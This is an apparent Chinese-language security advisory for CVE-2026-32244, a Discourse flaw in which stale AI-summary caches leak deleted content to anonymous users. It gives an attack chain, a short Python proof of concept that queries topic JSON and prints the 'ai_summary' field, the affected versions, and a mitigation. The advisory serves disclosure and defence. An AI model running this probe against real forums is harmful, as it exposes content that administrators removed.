CVE-2026-32244 CVSS 5.3 中危

CVE-2026-32244 Discourse AI摘要信息泄露漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32244

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Discourse

漏洞概述

Discourse 开源讨论平台在特定版本前存在安全漏洞。由于其 AI 摘要功能的缓存机制缺陷，过时的缓存数据可能包含已被管理员删除或移除的敏感内容。这些信息会泄露给匿名用户或无特权用户，导致他们无需任何认证即可查看到本应受保护的已移除内容，造成信息泄露风险。

技术细节

该漏洞的核心原因在于 Discourse 处理 AI 摘要缓存时的逻辑缺陷。当系统生成话题的 AI 摘要后，会将摘要内容存储在缓存中。若管理员随后删除了原始帖子中的敏感部分或移除了特定帖子，缓存层并未正确失效或更新。这导致当匿名用户或缺乏权限的用户请求该话题时，后端直接返回了过时的缓存摘要，而不是基于当前权限重新生成或检查内容。攻击者利用此漏洞，无需经过身份认证，即可通过网络访问获取到已被删除的敏感信息，绕过了系统的访问控制策略。攻击者只需枚举话题 ID，并检查返回的 JSON 数据中是否包含摘要字段，即可提取出已删除的内容。

攻击链分析

STEP 1

侦察

攻击者识别出运行受影响 Discourse 版本的目标网站。

STEP 2

识别

攻击者寻找可能包含敏感信息且已被删除或移除访问权限的话题ID。

STEP 3

利用

攻击者以匿名用户身份访问话题接口，请求该话题的详细数据。

STEP 4

泄露

服务器返回过时的 AI 摘要缓存，攻击者从中提取出本应不可见的敏感内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-32244: Discourse AI Summary Information Leak
# This script checks if an outdated AI summary is exposed to unauthenticated users.

target = "https://target-discourse-site.com/t/some-topic-id.json"

headers = {
    "User-Agent": "Mozilla/5.0"
}

try:
    # Request topic data as an anonymous user
    response = requests.get(target, headers=headers)

    if response.status_code == 200:
        data = response.json()
        
        # Check for AI summary in the response (structure may vary)
        # In vulnerable versions, this might contain deleted content
        if 'ai_summary' in data or 'post_stream' in data:
            print("[+] Potential Leak Detected!")
            print("[+] AI Summary Data:", data.get('ai_summary'))
        else:
            print("[-] No AI summary found or patch applied.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Discourse < 2026.1.4

Discourse < 2026.3.1

Discourse < 2026.4.1

Discourse < 2026.5.0-latest.1

防御指南

临时缓解措施

如果无法立即升级，建议在后台管理界面中，通过限制摘要生成角色（Personas）的允许组来收紧摘要生成权限，防止敏感内容被 AI 抓取和缓存。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表